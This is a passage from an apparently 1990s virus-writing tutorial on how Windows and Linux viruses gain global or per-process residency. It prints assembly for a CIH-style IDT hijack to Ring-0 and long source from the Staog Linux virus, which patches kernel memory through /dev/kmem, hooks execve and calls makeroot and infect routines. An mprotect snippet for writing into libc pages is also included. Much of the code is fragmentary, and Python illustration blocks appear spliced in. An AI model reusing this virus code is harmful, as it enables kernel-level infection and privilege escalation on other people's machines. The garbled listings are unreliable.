jumps to the PLT of the host only with the opcode CALL *EBP also this instruction is not codifies in host's code, it's done by the dynamic linker even before the host takes the control (i still don't know why).

Anyway this method is very interesting and useful.

Resident Viruses

Global residency in Ring-0

The resident viruses in Ring-0 are those that achieve maximum privileges in the processor, and already in Ring-0 they hook the system calls made by all the processes of the system.

To reach Ring-0, a user process could try several things: it could try to modify the IDT to create a TRAP GATE, modify the GDT or the LDT to create a CALL GATE, or even patch Ring-0 code, so that our code receives the execution thread already in Ring-0. Without any doubt this looks like hard work, because all those structures are, or should be, protected by the OS.

But on systems like Windows 95, code like this (used by the CIH virus) lets us jump to Ring-0 without difficulty:


        .model  flat,STDCALL

extrn   ExitProcess:PROC


idtaddr dd      ?,?


;************* Start of code to achieve Ring-0 *************


        sidt    qword ptr [idtaddr]     ; Obtain limit and address of the IDT
        mov     ebx,dword ptr [idtaddr+2h] ; in EBX the base
        add     ebx,8d*5d               ; Modify int 5 cause i'm gonna use its
                                        ; IDT entry
        lea     edx,[ring0code]         ; in EDX goes the ring0code offset  
        push    word ptr [ebx]          ; Modify IDT entry offset for make
        mov     word ptr [ebx],dx       ; the jump to ring0code when the int
        shr     edx,16d                 ; 5h is executed
        push    word ptr [ebx+6]
        mov     word ptr [ebx+6],dx

        int     5h                      ; Generate the exception

        mov     ebx,dword ptr [idtaddr+2h] ; Restore entry offset of the IDT
        add     ebx,8d*5h
        pop     word ptr [ebx+6]                  
        pop     word ptr [ebx]
        push    -1
        call    ExitProcess

                                        ; Code executed under Ring-0




        end     startvirii


What makes it possible for this code to work in Windows? The answer is simple: first, Windows can address kernel memory with user selectors; second (incredible as it seems), it has no paging protection on addresses above 0xC0000000, where, as in Linux, the Ring-0 code lives.

So if we can address the IDT memory, and we can also write there, the jump to Ring-0 is easy. In this example we have chosen int 0x05 because it is already a TRAP GATE in Windows; that's why we only modify the offset of its IDT entry, so that instead of jumping to the memory address assigned by Windows, it jumps to our label ring0code inside the PerProcess memory of our process.

However, in Linux we can't address user memory with Ring-0 selectors, so even if we could address kernel memory and the paging protection were deactivated, modifying the IDT wouldn't be enough. If we modified the int 0x5 entry of the IDT to create a TRAP GATE, the gate would have to carry the Ring-0 selector of Linux (0x10), which does not help us. In the IDT we would find the address 0x10:ring0code for the jump, but that address doesn't point to the PerProcess memory; since the base address of the 0x10 segment is 0xC0000000, we would really be jumping to the address 0xC0000000+ring0code.

Let's see where the IDT lies in Linux. Assemble the following code with NASM:

        [extern puts]
        [global main]
        [SECTION .text]

main:   sidt    [data_]         ; Put in data_ the IDT limit and address
        sgdt    [data_]         ; Put in data_ the GDT limit and address
        sldt    [data_]         ; Put in data_ the LDT selector
        [SECTION .data]

data_   dd      0x0,0x0

Executing this step by step, and reading the value stored in 'data_' after each instruction, we get the following memory dumps (0x80495ED = address of the 'data_' variable):

        Dump after SIDT

        (gdb)x/2 0x80495ED
        0x80495ed <data_>: 0x501007FF       0x0807C180

        Dump after SGDT

        (gdb)x/2 0x80495ED
        0x80495ed <data_>: 0x6880203F       0x0807C010  

        Dump after SLDT

        (gdb)x/2 0x80495ED
        0x80495ed <data_>: 0x688002Af       0x0807C010

The first and the second instructions store in the first 16 bits of 'data_' the IDT and the GDT limits respectively, and in the next 32 bits the linear address of those structures. SLDT, by contrast, only returns a selector that points to the LDT's descriptor inside the GDT (each LDT must have a descriptor defined in the GDT).

So we know that the IDT has base address 0xC1805010 and a limit of 0x7FF. The GDT has base address 0xC0106880 and a limit of 0x203F. Of the LDT we only know that its selector is 0x2AF. As we were expecting, the addresses are all above 0xC0000000, so they are well protected from user processes.
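To check how the base and limit values are read from the dumps, here is a small Python sketch. It only repacks the two 32-bit words printed by gdb into the 6-byte layout that SIDT and SGDT store (16-bit limit followed by 32-bit base); the function name is made up for the illustration.

```python
import struct

def decode_table_register(word0: int, word1: int):
    """Decode the two little-endian dwords shown by gdb's x/2 command."""
    raw = struct.pack("<II", word0, word1)        # the 8 bytes as they sit in memory
    limit, base = struct.unpack_from("<HI", raw)  # 2-byte limit, then 4-byte base
    return limit, base

idt_limit, idt_base = decode_table_register(0x501007FF, 0x0807C180)
gdt_limit, gdt_base = decode_table_register(0x6880203F, 0x0807C010)
ldt_selector = 0x688002AF & 0xFFFF                # SLDT stores only 16 bits

print(hex(idt_limit), hex(idt_base))
print(hex(gdt_limit), hex(gdt_base))
print(hex(ldt_selector))
```

The last two bytes of each dump (0x0807) are not written by SIDT or SGDT; they are simply whatever was in memory after 'data_'.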

Another way to access kernel memory could be to map kernel pages below 0xC0000000, but unfortunately that is not possible, because the page table is mapped above the 0xC0000000 address, so it can't be modified by Ring-3 processes. Linux maps all the physical memory of your machine starting at the linear address 0xC0000000 or, in other words, at the virtual address 0x0 of the kernel segment 0x10. We can build a module that reads the CR3 register, which contains the physical address of the page directory (the top level of the page table), and with that information display the mapped pages. The program would be the following one:

                      Page Table Reader


        Format of an entry
       31-12         11-9   7    6    5     2      1    0
       address        OS    4M   D    A    U/S    R/W   P
       If P=1 the page is in memory
       If R/W=0 the page is read-only
       If U/S=1 the page is a user page
       If A=1 the page has been accessed
       If D=1 the page is dirty
       If 4M=1 it's a 4M page (only for page directory entries)
       OS is specific to the operating system
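The bit layout above can be tried out with a short Python sketch before reading the module. The entry value used here is hypothetical (it is not taken from a real dump), and the field names are my own.

```python
def decode_entry(entry: int) -> dict:
    """Split a 32-bit page directory/table entry into the fields listed above."""
    return {
        "address":  entry & 0xFFFFF000,   # bits 31-12
        "os":       (entry >> 9) & 0x7,   # bits 11-9
        "four_mb":  (entry >> 7) & 1,     # only meaningful in directory entries
        "dirty":    (entry >> 6) & 1,
        "accessed": (entry >> 5) & 1,
        "user":     (entry >> 2) & 1,
        "writable": (entry >> 1) & 1,
        "present":  entry & 1,
    }

# Hypothetical directory entry: a present, writable, user-visible 4M page
# that maps physical address 0.
fields = decode_entry(0x000000E7)
for name, value in fields.items():
    print(name, hex(value))
```

These are the same masks and shifts that the module applies to each entry inside its printk calls.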


#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/mm.h>
#include <asm/system.h>
#include <linux/sched.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/page.h>
#include <asm/pgtable.h>
#ifdef MODULE

extern void *sys_call_table[];
unsigned long *tpaginas;
unsigned long r_cr0;
unsigned long r_cr4;       /* read some interesting registers */

int init_module(void)
  unsigned long *temp;
  int x,y,z;
                          /* Read the physical address of the page table that
                          is matches with the virtual address */

                          /* And btw, i read some interesting processor regs
                          like cr0 and cr4 */

                          /* As we can see, in CR4 is activated the option of
                          4M pages */

                          /* And in CR0 the WP bit active :) */                          
    movl %cr3,%eax
    movl %eax,(tpaginas)
    movl %cr0,%eax
    movl %eax,(r_cr0)
    movl %cr4,%eax
    movl %eax,(r_cr4)
  printk(" The physical and virtual address \n");
  printk(" of the page table is : %x\n",tpaginas);
  printk(" Control Register Cr0: %x\n",r_cr0);
  printk(" Control Register Cr4: %x\n",r_cr4);
  for (z=0;z<90000000;z++){}
if (((unsigned long) *tpaginas & 0x01) == 1)
 printk("Entry %x  -> %x ",x,(unsigned long) *tpaginas & 0xfffff000);  
 printk("      u/s:%d      r/w:%d\n",
        (((unsigned long) *tpaginas & 0x04)>>2),(((unsigned long) *tpaginas & 0x02)>>1));
 printk("      OS:%x  ",((unsigned long) *tpaginas &0xffff ) >>9 );
 printk("   p:%d\n",((unsigned long) *tpaginas & 0x01));

 if ((((unsigned long) *tpaginas & 0x80)>>7)==1)
             printk("In the virtual address ->  %x",x<<22);
             printk(" there is a 4M page \n");
             for (z=0;z<90000000;z++){};
 for (z=0;z<4000000;z++){};

  temp=((unsigned long) *tpaginas & 0xfffff000); /* in temp i read the page
                                                    table address */

  if (temp!=0 && ((unsigned long) *tpaginas & 0x1))
           for (y=0;y<0x3ff;y++)
  if  (((unsigned long) *temp & 0x01) == 1)
  printk("Virtual  %x -> %x ",(x<<22|y<<12),((unsigned long) *temp & 0xfffff000));  
  printk("      u/s:%d      r/w:%d",(((unsigned long) *temp & 0x04)>>2),(((unsigned long) *temp & 0x02)>>1));
  printk("      OS:%x  ",((unsigned long) *temp &0xffff ) >>9 );
  printk("   p:%d\n",((unsigned long) *temp & 0x01));
  if (*temp!=0) {for (z=0;z<4000000;z++){}};    /* slow-down */


void cleanup_module(void)



After executing this program we get the pages mapped at that moment, and the protection attributes of each page.

The first pages we would see are the read-only pages of the process being executed in Ring-3, at address 8040000, with read-only attributes and the user bit; the next ones are the read/write pages of the executable, with user attributes too. After that, at address 40000000, we have the libc library mapped in memory in a similar way: first r/w code, and then some read-only pages. When we arrive at the linear address 0xC0000000 we enter the marvelous world of the core, where all the physical memory of your PC is mapped. If the processor is a Pentium or higher, it will use 4M pages. So, if you have 16 megs of RAM, Linux uses 4 entries of the page directory, starting at the 0xC0000000 address, to map those 16 megs; if you have 32 megs it uses 8, and so on.
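The count of directory entries is simple arithmetic, sketched below in Python. The only assumptions are the ones already stated in the text: 4M pages, a mapping that starts at linear address 0xC0000000, and a page directory of 1024 entries (the standard i386 size).

```python
PAGE_4M = 4 * 1024 * 1024
KERNEL_BASE = 0xC0000000
DIRECTORY_ENTRIES = 1024

def entries_needed(ram_bytes: int) -> int:
    """Number of 4M directory entries needed to map ram_bytes (rounded up)."""
    return -(-ram_bytes // PAGE_4M)

first_index = KERNEL_BASE >> 22            # directory index of 0xC0000000
for megs in (16, 32, 1024):
    n = entries_needed(megs * 1024 * 1024)
    print(megs, "MB ->", n, "entries, directory slots left:",
          DIRECTORY_ENTRIES - first_index - n)
```

With 1G of RAM the mapping would need all 256 entries from index 768 to the end of the directory, leaving no linear addresses free above the mapped memory.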

This scheme raises some questions, for example: what would happen if we had 1G of physical memory? The code of the core lives in these pages, as does the page table, and surprisingly they have no protection via paging: the pages are marked with r/w attributes and the user bit, so badly coded modules that try to overwrite the code of the core would succeed without causing any protection fault :)

But that's not all. After mapping all the physical memory of the machine, it maps some 4Kb pages, all with system attributes; one of them, used to store the IDT (interrupt table), is the only one with read-only attributes and the S bit, so any badly coded module that tried to overwrite it would fail and die with a protection fault, and the system would remain stable.

The fact that Ring-0 code is not able to modify a read-only page is controlled by the WP bit of the control register CR0. If that bit is set to 1, Ring-0 code cannot write to read-only pages, whether they are user or kernel pages. If that bit is set to 0, the memory protection works as on a 386 and Ring-0 code can do whatever it wants, being able to modify all mapped pages regardless of their protection attributes. So, if a Linux module wants to modify the IDT, it first has to clear the WP bit of CR0 to be able to write, or change the attributes of that page in the page table.

For all these reasons, the real protection mechanism in Linux is segmentation, not paging as in Windows NT. If we had 4G segments, as in NT, with paging left as it is, we would have free access to kernel memory, but this is not the case.

NOTE: Current versions of the core, such as 2.2.XX, use a protection similar to NT with 4G segments. Unfortunately i haven't been able to look at the page table of that version, but it would be foolish to assume it remains the same.

Another possible way to reach Ring-0 in Linux is to use the system call modify_ldt to create a CALL GATE. That system call was created so that WINE could emulate the Windows memory system, where the user segment descriptors lie in the LDT and not in the GDT, and where it's possible to address all the memory with those segments. Creating a CALL GATE with modify_ldt would be possible if we were able to write every field of each generated entry, but that's not possible. First of all, modify_ldt doesn't accept an INTEL segment descriptor as input; it uses this pseudo structure, which is later translated inside the call to a descriptor in INTEL format:

struct modify_ldt_ldt_s {
     unsigned int  entry_number;      /* The entry we wanna modify         */
     unsigned long base_addr;         /* The base address of the segment   */
     unsigned int  limit;             /* The limit of the segment          */
     unsigned int  seg_32bit:1;       /* If it's of 16 or 32 bits          */
     unsigned int  contents:2;        /* If it's of data, code or stack    */
     unsigned int  read_exec_only:1;  /* Protection attributes             */
     unsigned int  limit_in_pages:1;
     unsigned int  seg_not_present:1; /* If it's in memory or not          */
     unsigned int  useable:1;
};

If we look at the code of the call in /usr/src/linux/arch/i386/kernel/ldt.c, it shows us the transformation of that structure into an INTEL descriptor:

       *lp     = ((ldt_info.base_addr & 0x0000ffff) << 16) |
                  (ldt_info.limit & 0x0ffff);
        *(lp+1) = (ldt_info.base_addr & 0xff000000) |
                  ((ldt_info.base_addr & 0x00ff0000)>>16) |
                  (ldt_info.limit & 0xf0000) |
                  (ldt_info.contents << 10) |
                  ((ldt_info.read_exec_only ^ 1) << 9) |
                  (ldt_info.seg_32bit << 22) |
                  (ldt_info.limit_in_pages << 23) |
                  ((ldt_info.seg_not_present ^1) << 15) |
                  0x7000;

ldt_info is the structure we have passed as a parameter, and lp is a pointer into the LDT, to the segment entry we want to modify. Looking at the structure of an INTEL entry we can follow the transformation:

    63-56  55  54  53  52   51-48   47  46-45   44  43-40   39-16 15-0
    base   G   D   R   U    limit   P   DPL      S   type   base  limit
    31-24                   19-16                           23-0  15-0

With *lp we fill the first 32 bits of the entry, corresponding to the first 16 bits of the limit and the first 16 bits of the base address, and with *(lp+1) we fill in the rest of the information. But after all the operations with ldt_info, there is an OR with the constant 0x7000. In binary this constant is 0111000000000000, so the generated descriptors will always have bits 44, 45 and 46 set. Those bits correspond to the S bit and the DPL. A DPL of 3 means we can only create user segments. That doesn't matter, because the segment must be a user segment for a user to be allowed to execute it. But the other bit, the S bit, is very important. The S bit is 1 for a normal segment and 0 for a system segment such as a TSS or a CALL GATE, so creating CALL GATES with modify_ldt is impossible.

Modify_ldt also prevents the creation of segments that reach above 0xC0000000, which would allow addressing the kernel's space. It checks the limits of the segment we want to create with the limits_ok function, which returns a boolean value as can be seen in this instruction. Here last is the last byte accessible through the segment, first is the first one, and the constant TASK_SIZE has the value 0xC0000000.

       return (last >= first && last < TASK_SIZE);
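The effect of the 0x7000 constant and of the limit check can be verified with a Python sketch that repeats the same bit operations. It is an illustration only: the function names are mine, and limits_ok here takes first and last directly instead of computing them from the structure as the kernel does.

```python
TASK_SIZE = 0xC0000000

def pack_descriptor(base, limit, seg_32bit=1, contents=0, read_exec_only=0,
                    limit_in_pages=0, seg_not_present=0):
    """Build the two dwords of the descriptor with the expressions shown above."""
    low = ((base & 0x0000FFFF) << 16) | (limit & 0x0FFFF)
    high = ((base & 0xFF000000) |
            ((base & 0x00FF0000) >> 16) |
            (limit & 0xF0000) |
            (contents << 10) |
            ((read_exec_only ^ 1) << 9) |
            (seg_32bit << 22) |
            (limit_in_pages << 23) |
            ((seg_not_present ^ 1) << 15) |
            0x7000)
    return low, high

def s_bit(high):                 # descriptor bit 44 = bit 12 of the high dword
    return (high >> 12) & 1

def dpl(high):                   # descriptor bits 45-46 = bits 13-14
    return (high >> 13) & 3

def limits_ok(first, last):
    return last >= first and last < TASK_SIZE

# Whatever the caller passes in, S stays 1 and DPL stays 3.
for contents in range(4):
    _, high = pack_descriptor(0, 0xFFFFF, contents=contents, limit_in_pages=1)
    print(contents, s_bit(high), dpl(high))

print(limits_ok(0, 0xBFFFFFFF), limits_ok(0, 0xC0000000))
```

No combination of the input fields reaches bits 12 to 14 of the high dword, so the caller has no way to clear the S bit.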

If we can't write to the IDT, the GDT, the LDT or the page table to jump to Ring-0, and modify_ldt cannot be used to create CALL GATES, another possibility is to use the virtual device files to access kernel memory. This has a very important problem: files such as /dev/mem and /dev/kmem can, by default, only be accessed by root. Even so, it's one of the more interesting choices for creating global residents under Linux. Staog is one of the few Linux viruses that uses this method. It doesn't wait for root to execute it either, as it uses 3 different exploits to get access to /dev/kmem, but relying on exploits limits its functionality to a few kernel versions. /dev/kmem gives access to kernel memory; the first byte of that file is the first byte of the kernel's segment or, what is the same, the linear address 0xC0000000.

.text                                     # This is the code that hooks the
                                          # sys_call to execve
.string "Staog by Quantum / VLAD"      
.global main
        movl %esp,%ebp
        movl $11,%eax                     # Firstly, checks if it's already
        movl $0x666,%ebx                  # resident, calling to execve with
        int $0x80                         # the value 0x666 in EBX, and if it
        cmp $0x667,%ebx                   # is in mem, the virii in mem will
        jnz goresident1                   # return the value 0x667
        jmp tmpend
        movl $125,%eax
        movl $0x8000000,%ebx
        movl $0x4000,%ecx
        movl $7,%edx
        int $0x80

This code is very important, because it calls mprotect to unprotect the memory pages used by the virus. This avoids having to modify the ELF file so that the virus data goes into a data section and the code into a code section. This way, all the data of the virus can be kept in the same page as its code, and it doesn't matter that the virus is in a code section: at execution time, it unprotects it.

NOTE: It is only possible to execute mprotect inside the PerProcess memory.

The first thing it tries is to reserve some kernel memory to copy the virus code there; afterwards it modifies the sys_call_table entry that corresponds to execve, replacing it with a pointer to its hook routine for that function. Memory inside the kernel can only be reserved with kernel-internal calls like kmalloc. To be able to execute one, the virus overwrites the system call uname using /dev/kmem, and then calls uname with int 0x80; by the time the interrupt returns, the code that reserves memory with kmalloc has already been executed. But before all that, it needs to know the address of uname. For that, the virus uses the system call get_kernel_syms, which returns a list of all the exported internal Linux functions, and also pointers to structures such as the sys_call_table mentioned above, which is an array in memory with pointers to the functions accessible through int 0x80, like the uname function.
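The table returned by get_kernel_syms is a flat array of 64-byte entries: a 4-byte address followed by a 60-byte zero-terminated name, the same information shown in /proc/ksyms. The Python sketch below parses such a buffer. The buffer is synthetic and the addresses in it are invented for the example; nothing is read from a real kernel.

```python
import struct

ENTRY = struct.Struct("<I60s")     # 4-byte address + 60-byte name = 64 bytes

def parse_symbols(buf: bytes) -> dict:
    """Map symbol name -> address for every 64-byte entry in buf."""
    table = {}
    for off in range(0, len(buf) - ENTRY.size + 1, ENTRY.size):
        value, raw_name = ENTRY.unpack_from(buf, off)
        name = raw_name.split(b"\0", 1)[0].decode("ascii")
        table[name] = value
    return table

# Synthetic table with made-up addresses, only to exercise the parser.
sample = b"".join(ENTRY.pack(addr, name) for addr, name in [
    (0xC0100000, b"example_symbol_a"),
    (0xC0100400, b"example_symbol_b"),
])
symbols = parse_symbols(sample)
print(len(sample), len(symbols) << 6)      # table size = entry count shifted by 6
print({name: hex(addr) for name, addr in symbols.items()})
```

Since every entry is 64 bytes, the size of the table is the number of symbols shifted left by 6, which is the multiplication done before reserving stack space in the listing that follows.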

       movl $130,%eax                    # Obtain the number of symbols
        movl $0,%ebx                      # passing in EBX the value 0
        int $0x80                         # Returns in EAX:Number of symbols
        shll $6,%eax          # Make a 6 bit shifting to the left. This is
                              # the same as multiply the symbol number by 64
                              # that are the bytes occupied by each entry
                              # returned by get_kernel_syms
                              # The information obtained is the same that the
                              # located at /proc/ksyms.
                              # 4 bytes with a kernel address and 60 bytes
                              # with symbol's name

        subl %eax,%esp        # Reserve space in the stack
        movl %esp,%esi        # before the call    
                              # the ESI register will point to a mem structure
        pushl %eax
        movl %esi,%ebx        # obtain kernel symbols
        movl $130,%eax
        int $0x80
        pushl %esi      
nextsym1:                     # Here i scan the symbol table in memory
        movl $thissym1,%edi   # seaching the string current (zero-terminated)
        push %esi
        addl $4,%esi
        cmpb $95,(%esi)
        jnz notuscore
        incl %esi
        pop %esi
        jz foundsym1
        addl $64,%esi         # Look how it increments 64 by 64 for make the
        jmp nextsym1          # comparisons
        movl (%esi),%esi
        movl %esi,current           # Store search result in the variable
        popl %esi                   # current

        pushl %esi      
nextsym2:                           # Look also the kmalloc symbol with the
        movl $thissym2,%edi         # same way.
        push %esi
        addl $4,%esi
        pop %esi
        jz foundsym2
        addl $64,%esi
        jmp nextsym2
        movl (%esi),%esi
        movl %esi,kmalloc          # Store search result in the kmalloc var
        popl %esi

        xorl %ecx,%ecx
nextsym:                           # find symbol
        movl $thissym,%edi         # And now sys_call_table address
        movb $15,%cl              
        push %esi
        addl $4,%esi
        pop %esi
        jz foundsym
        addl $64,%esi
        jmp nextsym
        movl (%esi),%esi
        pop %eax
        addl %eax,%esp

        movl %esi,syscalltable    # Store in the syscalltable variable the
        xorl %edi,%edi            # address found.

At this point the virus knows the memory position of the sys_call_table

        movl $devkmem,%ebx           # Open the /dev/kmem file
        movl $2,%ecx                 # EBX = Ptr to string with the name
        call openfile                # ECX = Open way ($2 read/write)
        orl %eax,%eax
        js haxorroot                 # If it couldn't be opened, jumps to a
        movl %eax,%ebx               # routine for access /dev/kmem by means
                                     # of exploits
 # Note that ESI still holds the address of the sys_call_table; if we add
 # 44 to it, we obtain a pointer to the place inside the sys_call_table
 # where the pointer to execve is stored

        leal 44(%esi),%ecx           # lseek to sys_call_table[SYS_execve]
        call seekfilestart
        movl $orgexecve,%ecx         # Read pointer's value
        movl $4,%edx                 # 4 bytes
        call readfile

        leal 488(%esi),%ecx          # Now move the coresponding entry to
        call seekfilestart           # uname inside the sys_call_table

        movl $taskptr,%ecx           # And read the sys_call_table[SYS_uname]
        movl $4,%edx                 # value, and store it in the var taskptr
        call readfile
        movl taskptr,%ecx            # Move ourselves to the code where is the
        call seekfilestart           # uname function in memory.

        subl $endhookspace-hookspace,%esp
                                     # Reserve space in the stack for the code
                                     # that i'm going to overwrite
        movl %esp,%ecx               # Read the code i'm going to overwrite
        movl $endhookspace-hookspace,%edx # of uname on the stack
        call readfile
        movl taskptr,%ecx           # Return to the beginning of uname routine
        call seekfilestart

        movl filesize,%eax              
        addl $virend-vircode,%eax
        movl %eax,virendvircodefilesize

 # Now write the routine for reserve memory over uname's code

        movl $hookspace,%ecx    
        movl $endhookspace-hookspace,%edx
        call writefile

        movl $122,%eax             # Make a call to uname, but what's really
        int $0x80                  # going to be executed will be our routine
        movl %eax,codeto           # EAX = address we've reserved
        movl taskptr,%ecx          # Go back to uname's code
        call seekfilestart

        movl %esp,%ecx                    # And restore the uname's original
        movl $endhookspace-hookspace,%edx # that we had temporally in stack
        call writefile                    # to its original place.
        addl $endhookspace-hookspace,%esp # Remove the memory we had reserved
                                          # in the stack
        subl $aftreturn-vircode,orgexecve      

        movl codeto,%ecx                  # Move now the pointer to the begin
        subl %ecx,orgexecve               # of the mem zone we had reserved
        call seekfilestart

        movl $vircode,%ecx                # And write the virus code in it
        movl $virend-vircode,%edx
        call writefile

        leal 44(%esi),%ecx                # Search the sys_call_table, relative
        call seekfilestart                # to execve, and i modify the orig.
                                          # pointer by our function
        addl $newexecve-vircode,codeto

        movl $codeto,%ecx                 # Write the new ptr in sys_call_table
        movl $4,%edx
        call writefile

        call closefile                    # close /dev/kmem


        call exit

openfile:                       # System calls made with int 0x80
        movl $5,%eax            # EAX = Function to do
        int $0x80               # see /usr/include/sys/syscall.h for a function
        ret                     # list

        movl $6,%eax
        int $0x80

        movl $3,%eax
        int $0x80

        movl $4,%eax
        int $0x80

        movl $19,%eax
        xorl %edx,%edx
        int $0x80

        movl $10,%eax
        int $0x80

        xorl %eax,%eax
        incl %eax
        int $0x80

thissym:                            # Here are defined some variables
.string "sys_call_table"            # See that they're in the same section of
                                    # the code. That's why we use mprotect.
.string "current"

.string "kmalloc"

.string "/dev/kmem"

.long 0x666

infect:                                   # Infection routine

       # Here should go the ELF infection routine. It consist in generate a
       # temporal file with the virus code and execute it with execve


.global newexecve
        pushl %ebp
        movl %esp,%ebp                      # In the stack will be all regs,
        pushl %ebx                          # see that we're inside an int 0x80
        movl 8(%ebp),%ebx
        cmpl $0x666,%ebx                    # If EBX = 0x666, we return
        jnz notserv                         # 0x667 because it's the residency
        popal                               # mark.
        incl 8(%ebp)                        
        popl %ebx
        popl %ebp
        call ring0recalc                    # Calculate the displacement of
ring0recalc:                                # addresses in memory
        popl %edi
        subl $ring0recalc,%edi
        movl syscalltable(%edi),%ebp        # EBP = Address of sys_call_table
        call saveuids                      
        call makeroot          
        call infect                         # Infect the file
        call loaduids                      
        popl %ebx
        popl %ebp
.byte   0xe9                                # Go to the original execve func.
orgexecve:                                  # 0xE9 is the jump opcode and the
.long   0                                   # next 4 bytes are the 4 bytes
aftreturn:                                  # of the orgexecve variable. The
                                            # equivalent would be jmp orgexecve
.long 0

.long 0

.global hookspace            # This is the routine that reserves memory.
hookspace:                   # Its the one that is overwritten by the virus
        push %ebp            # over uname.
        pushl %ebx
        pushl %ecx
        pushl %edx
        movl %esp,%ebp

        pushl $3
.byte   0x68
.long   0
.byte   0xb8               # movl $xxx,%eax ;0xb8 is the opcode of a movl and
kmalloc:                   # the next bytes correpond with the kmalloc var,
.long   0                  # so, when we find kmalloc in mem, a
        call %eax          # movl $kmalloc,%eax will be generated
                           # and with call %eax we jump to kmalloc for reserve
                           # memory                
        movl %ebp,%esp
        popl %edx
        popl %ecx
        popl %ebx
        popl %ebp      

.global endhookspace
.global virend

Global residency in Ring-3

This method of residency is based on hooking Ring-3 routines that are executed by all processes.

The Ring-3 code that can be executed by all processes is found in the libraries; in Windows, these are the DLLs.

Windows, for example, divides its address space into 4 arenas; each arena has a different purpose and holds different code and data. There is one arena dedicated to DOS that goes from virtual address 0 to 00400000, another one dedicated to the PerProcess memory, that goes from 00400000 to 80000000, another that holds the memory shared by all the processes, that goes from 80000000 to C0000000, and another dedicated to the VXDs, i.e. the kernel's code, that is executed in Ring-0 and goes from C0000000 to FFFFFFFF.

The most important library in Windows is KERNEL32.DLL, which contains the functions for file creation, memory handling, etc. (in Linux the equivalent would be the libc library).

Programs, instead of directly executing TRAP GATES to call Ring-0 code, use a dynamic link mechanism to jump to the library's code (Ring-3 code), which makes the jump to Ring-0 to obtain the desired kernel service. Windows 95 made a great design mistake: it loads the majority of libraries in the shared memory arena (the KERNEL32 library is loaded at address BFF70000). Placing the most important libraries in a shared memory arena has the advantage that the system doesn't have to load the library again for each program that imports calls from it, because it is already mapped in every process. This also makes it possible to hook system calls without needing to jump to Ring-0. Viruses like Win95.HPS and Win95.K32 use this fact to achieve global residency without jumping to Ring-0. However, this is not as easy as it sounds, because even though the kernel has no protection by paging, the code sections are protected by paging (to catch attempts to write into them). Still, they can be unprotected easily using VXD calls like _pagemodifypermissions or library calls like memoryprotect.

In Linux we could try to hook functions like execve in the libc library, located from virtual address 0x40000000 onwards. Any attempt by a program to write to protected pages causes a protection fault, because the code sections are protected by paging, just like the code sections of normal executables. But the function mprotect also works on library code, because libraries are located below 0xC0000000, in the PerProcess memory. Code like the following lets you unprotect pages of libraries like libc. As we saw in the introduction, in my Linux version the getpid function of libc is loaded at address 0x40073000; since that is a code section, it is protected against write attempts.

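        [section .text]
        [extern puts]
        [global main]

main:   pushad
        mov     eax,125                 ; 125 = mprotect (same number used by
                                        ; the Staog code above)
        mov     ebx,40073000h           ; Start address (page aligned)
        mov     ecx,02000h              ; Length: 2 pages
        mov     edx,07h                 ; read + write + exec
        int     80h                     ; Call to mprotect
        mov     ebp,40073000h
        xor     eax,eax                 ; Put EAX to 0
        mov     dword [ebp],eax         ; Write EAX value in EBP address
        popad                           ; 0x40073000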

Note that without the call to mprotect this program would generate a protection fault. Now try to execute 2 copies of the program simultaneously. The first copy unprotects a libc page and sets the first bytes of getpid to 0; the second copy is stopped with gdb at main, to check what value is at address 0x40073000. The value won't be 0; it will be the original value.

This is because Linux doesn't load its libraries in shared arenas; it loads them in the PerProcess memory. But if the PerProcess memory is different for each process, do the libraries get loaded again with each executable, occupying memory unnecessarily? The answer is NO. The solution is the copy-on-write mechanism, which allows different processes to share read/write memory pages while those pages are mapped in the memory of each process. When the program is loaded in memory, address 0x40073000 holds the memory page of the parent program, and if we try to write to it, the system checks whether it's a read/write or a read-only page. If it's read-only, the system generates a page fault; if it's read/write, the OS makes a copy of that page for the child process, so when the program writes to it, it's really writing to its own page, not to the parent's page. This method allows libraries to be shared in memory while preserving security and preventing undesired attempts at global residency. Linux does implement shared memory, but only for interprocess communication mechanisms (IPC).
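The copy-on-write behaviour can be observed from user space with a harmless experiment. The Python sketch below is my own illustration, not the libc test described above: it uses a private anonymous mapping and fork, so the parent and the child start out sharing the same page, and then the child writes to it.

```python
import mmap
import os

def cow_demo() -> bytes:
    """Return what the parent sees after the child overwrites a private page."""
    page = mmap.mmap(-1, mmap.PAGESIZE,
                     flags=mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS)
    page[:4] = b"orig"
    pid = os.fork()
    if pid == 0:                    # child: the write triggers the page copy
        page[:4] = b"\x00" * 4
        os._exit(0)
    os.waitpid(pid, 0)              # parent: wait until the child has written
    return bytes(page[:4])

result = cow_demo()
print(result)
```

The parent still reads its original bytes, just as the second copy of the program still finds the original code at 0x40073000: the write went to a copy that belongs only to the process that made it.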

PerProcess residency

As I explained in the chapter on ELF infection, ELF is a very powerful format, and among its important features is the dynamic linking of functions.

Linux executables don't usually issue int 0x80 themselves; they leave that job to libraries like libc. Using libraries saves disk space, because that code is not included in every executable. But these libraries can be loaded at any address of the PerProcess memory. This requires a mechanism that allows calls to functions in other files or libraries; this mechanism is dynamic linking.

There are 2 main sections involved in the dynamic linking of functions: the .plt section (Procedure Linkage Table) and the .got section (Global Offset Table).

Linux's dynamic linking system has advantages over other systems. The PE format of Windows, for example, has specific sections for linkage such as the Import Table, which holds one entry per function imported from libraries, and those references are resolved at load time. Linux, however, doesn't resolve them at load time; it waits for the first call to a function before resolving its reference. On the first call, the program hands control to the dynamic linker, which is mapped into the process's memory along with the libraries. The linker resolves the reference and stores the absolute address of the function in an in-memory table called .got, so subsequent calls jump directly to the function without going through the dynamic linker first. This improves system performance by not resolving references that the executable may never use. If we disassemble the following executable...

          #include <unistd.h>

          void main()
          {
              getpid();        /* 1st call to getpid */
              getpid();        /* 2nd call to getpid */
          }

We obtain the following assembler code:

      0x8048480 <main>:    pushl %ebp
      0x8048481 <main+1>:  movl  %esp,%ebp
      0x8048483 <main+3>:  call  0x8048378 <getpid>
      0x8048488 <main+8>:  call  0x8048378 <getpid>
      0x804848d <main+13>: movl  %ebp,%esp
      0x804848f <main+15>: pop   %ebp
      0x8048490 <main+16>: ret

The calls to getpid are built as jumps to an entry in the .plt section. As we can see with the command "info file", the .plt section is mapped between 0x08048368 and 0x080483C8. If we continue tracing inside the .plt code we will see the following:

      0x8048378 <getpid>:    jmp *0x80494e8
      0x804837e <getpid+6>:  push $0x0
      0x8048383 <getpid+11>: jmp 0x8048368 <_init+8>

